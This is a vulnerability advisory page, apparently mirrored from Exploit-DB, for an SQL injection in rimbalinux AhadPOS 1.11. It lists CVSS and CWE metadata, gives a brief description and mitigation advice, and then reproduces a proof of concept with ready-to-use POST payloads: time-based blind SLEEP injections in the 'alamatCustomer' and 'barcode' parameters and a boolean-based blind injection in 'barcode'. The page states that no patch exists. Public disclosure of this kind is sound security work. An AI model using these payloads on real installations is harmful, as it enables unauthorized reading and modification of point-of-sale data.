rimbalinux AhadPOS 1.11 - 'alamatCustomer' SQL Injection

vendor:

AhadPOS

by:

Cakes

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: AhadPOS

Affected Version From: 1.11

Affected Version To: 1.11

Patch Exists: NO

Related CWE: N/A

CPE: a:rimbalinux:ahadpos:1.11

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: CentOS 7

2019

rimbalinux AhadPOS 1.11 – ‘alamatCustomer’ SQL Injection

rimbalinux AhadPOS 1.11 is vulnerable to SQL injection. This vulnerability can be exploited by malicious users to disclose sensitive information from the application, modify data, and potentially compromise the application and all its users. Two types of SQL injection are demonstrated in the PoC: time-based and boolean-based blind SQL injection. The payloads for each type are provided in the text.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

# Exploit Title: rimbalinux AhadPOS 1.11 - 'alamatCustomer' SQL Injection
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/rimbalinux/AhadPOS
# Software Link: https://github.com/rimbalinux/AhadPOS.git
# Version: 1.11
# Tested on: CentOS 7
# CVE: N/A

# PoC for time-based and boolean based blind SQL injection

# Parameter: alamatCustomer (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
    
Payload: namaCustomer=test&alamatCustomer=test'||(SELECT 0x4b686f74 FROM DUAL WHERE 8368=8368 AND (SELECT 9520 FROM (SELECT(SLEEP(5)))gtad))||'&telpCustomer=12312345&keterangan=tester

# Parameter: barcode (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause
# Vector: OR [INFERENCE]    
    
Payload: barcode=-3529' OR 4127=4127-- HRDC&jumBarang=1&btnTambah=(t) Tambah
    
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
    
Payload: barcode=123' AND (SELECT 1256 FROM (SELECT(SLEEP(5)))Nhnk)-- zXsC&jumBarang=1&btnTambah=(t) Tambah